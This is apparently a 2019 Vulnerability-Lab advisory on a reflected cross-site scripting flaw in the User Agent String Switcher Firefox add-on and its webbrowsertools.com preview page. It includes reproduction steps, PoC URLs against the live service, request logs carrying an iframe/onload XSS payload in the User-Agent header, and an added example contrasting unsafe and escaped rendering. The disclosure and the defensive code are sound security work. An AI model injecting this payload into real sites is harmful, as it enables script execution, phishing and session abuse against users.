Document Title:
===============
User Agent String Switcher Service - XSS Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2189


Release Date:
=============
2019-08-14


Vulnerability Laboratory ID (VL-ID):
====================================
2189


Common Vulnerability Scoring System:
====================================
4


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
This extension allows you to reliably spoof your browser "User-Agent" string to a custom one. The extension provides 
a list of all well-known "User-Agent" strings for different browsers and operating systems.

(Copy of the Homepage:  https://addons.mozilla.org/de/firefox/addon/user-agent-string-switcher/  & https://webbrowsertools.com/useragent/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered multiple client-side cross site scripting vulnerabilities in the User Agent String Switcher online web service.


Vulnerability Disclosure Timeline:
==================================
2019-08-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple client-side cross site scripting vulnerabilities have been discovered in the User Agent String Switcher online web service.
The vulnerability allows an attacker to inject malicious script code into client-side browser requests.

The vulnerability is located in the user agent input field of the browser switcher. The user agent input field
can be used to inject malicious script code. After the injection, the add-on allows the user to run a test against the
webbrowsertools.com domain. On that service the user can preview the newly configured user agent string
(./useragent/). The injected script code executes in the affected window.navigator, ua-parser-js and platform.js
views of that page, because the raw user agent value is reflected there. The request is performed via GET with the
parameters ?method=normal&verbose=false&r.

The vulnerability can be used to trigger a remote cross site scripting issue with low required user interaction.
Injection of malformed or malicious script code allows attackers to perform external redirects, cross site request
forgery, phishing attempts or further non-persistent manipulation of the affected web module context.

Mozilla Extension:
[+] User Agent String Switcher (https://addons.mozilla.org/de/firefox/addon/user-agent-string-switcher/)

Web Service of Extension:
[+] User Agent String Switcher Web Service (https://webbrowsertools.com/useragent/)

Affected File(s):
window.navigator
ua-parser-js v0.7.19
platform.js v1.3.3
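The rendering pattern behind the three affected views, as an added example that is not code from the advisory, the add-on or webbrowsertools.com; the function names and the sample UA string are constructed for illustration, and the hardened variant shows the fix a defender would apply:

```javascript
// Added example (not code from the advisory, the add-on or webbrowsertools.com):
// a string-level model of the bug class described above. A "what is my user agent"
// page that builds its navigator / ua-parser-js / platform.js result panes by
// concatenating the raw User-Agent into HTML lets a crafted UA inject markup.

// Constructed sample UA in the shape of the advisory's payload (not a real capture).
const SAMPLE_UA = 'Mozilla/5.0 (X11; Linux i686; rv:62.0) '
  + '<iframe src=evil.source onload=alert(document.domain)></iframe>'
  + 'Gecko/20100101 Firefox/62.0';

// Vulnerable pattern: the UA string is treated as HTML (innerHTML / template concat).
function renderPaneUnsafe(label, ua) {
  return '<tr><th>' + label + '</th><td>' + ua + '</td></tr>';
}

// Escape the characters that are significant in an HTML text or attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pattern: same pane, UA rendered as inert text. In a live page the
// equivalent is `cell.textContent = navigator.userAgent` instead of innerHTML.
function renderPaneSafe(label, ua) {
  return '<tr><th>' + escapeHtml(label) + '</th><td>' + escapeHtml(ua) + '</td></tr>';
}

// All three views on the page derive from the same navigator.userAgent value,
// so one injected UA reaches every pane. Model that with one render per view.
function renderAllPanes(ua, render) {
  return ['navigator', 'ua-parser-js', 'platform.js']
    .map((view) => render(view, ua))
    .join('\n');
}

// Defender-side check: does the UA contain anything that reads as an HTML tag?
// Useful for logging or alerting on UA headers before they reach a reflecting page.
function uaContainsMarkup(ua) {
  return /<\s*\/?[a-z!?]/i.test(ua);
}

// Returns true when the rendered HTML still carries a raw <iframe> tag from the UA.
function containsRawTag(html) {
  return /<iframe\b/i.test(html);
}
```

Running the same UA through both renderers shows the unsafe output carrying the raw tag while the escaped output keeps it as visible text.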


Proof of Concept (PoC):
=======================
The security web vulnerability can be exploited by local and remote attackers with low user interaction (click).
For a security demonstration, or to reproduce the vulnerability, follow the information and steps below.


Manual steps to reproduce (Local) ...
1. Open the Mozilla Firefox web browser
2. Install the User Agent String Switcher add-on for Firefox
3. Open it and inject the test payload or your own test script code into the user agent input field at the bottom of the add-on
4. Apply the settings and open the test page
5. Switch through the tabs of the affected file types
6. Successful reproduction of the vulnerability!


Manual steps to reproduce (Remote) ...
1. Prepare a GET request as in the local injection description above
2. Copy the links with the correct r parameter to display the contents and execute the script code on the client side
3. Successful reproduction of the vulnerability!


PoC Web Urls: Exploitation
https://webbrowsertools.com/useragent/?method=normal&verbose=false&r=0.2528440576064094
https://webbrowsertools.com/useragent/?method=normal&verbose=false&r=0.4067375366054382


PoC: Attacker Browser Settings (Example User Agent Payload)
Host: www.vulnerability-lab.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:62.0) <[INJECTED SCRIPT CODE PAYLOAD!]>Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=idtvmbt3io7q6pd6n0gn


--- PoC Session Logs ---
- platform.js
https://unpkg.com/platform@1.3.5/platform.js
Host: unpkg.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:62.0) <iframe src=evil.source onload=alert(document.domain)></iframe>Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://webbrowsertools.com/
GET: HTTP/2.0 200 OK
content-type: application/javascript; charset=utf-8
vary: Accept-Encoding
access-control-allow-origin: *
etag: W/"9eef-dbZwW8lUf+koS79YPLDTa/M/XUE"
age: 315114
cache-control: public, max-age=31536000
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2
- ua-parser.js
https://unpkg.com/ua-parser-js@0.7.19/src/ua-parser.js
Host: unpkg.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:62.0) <iframe src=evil.source onload=alert(document.domain)></iframe>Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://webbrowsertools.com/
GET: HTTP/2.0 200 OK
content-type: application/javascript; charset=utf-8
vary: Accept-Encoding
access-control-allow-origin: *
etag: W/"ca6c-WNn+CdwU63oH9i+AYovEdlMEJEU"
cache-control: public, max-age=31536000
age: 549107
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
content-encoding: br
X-Firefox-Spdy: h2
Content-Security-Policy: upgrade-insecure-requests
- navigator
Host: developer.mozilla.org
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:62.0) <iframe src=evil.source onload=alert(document.domain)></iframe>Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://webbrowsertools.com/


Reference(s):
https://developer.mozilla.org/docs/Web/API/Window/navigator
https://unpkg.com/ua-parser-js@0.7.19/src/ua-parser.js
https://unpkg.com/platform@1.3.5/platform.js

https://github.com/faisalman/ua-parser-js
https://github.com/bestiejs/platform.js/


Security Risk:
==============
The security risk of the client-side input validation web vulnerability in the web tools service of the add-on is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab 
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or 
edit our material, contact (admin@ or research@) to ask for permission.

				    Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™